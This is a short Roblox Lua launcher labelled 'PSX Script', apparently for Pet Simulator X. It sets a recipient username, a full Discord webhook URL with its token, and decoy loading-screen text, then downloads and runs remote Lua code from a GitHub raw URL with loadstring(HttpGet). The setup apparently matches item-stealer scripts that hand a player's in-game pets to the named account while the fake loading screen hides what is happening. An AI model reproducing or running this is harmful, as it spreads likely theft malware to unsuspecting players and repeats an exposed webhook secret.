Username = "2233268520"

WebHook = "https://discord.com/api/webhooks/1087990783140974672/pIAbTpT6ZeG4y0QcAxpKznn88sk2_1m6L6QpQOmE0EmlKc32GKHwPG-qGuB_K2IR1QeO"

loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI

_G.CustomScriptName = "PSX Script"

_G.Text1 = "Script Loaded..."

_G.Text2 = "Waiting for Script"

_G.Text3 = "Checking Scripts..."

_G.Text4 = "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
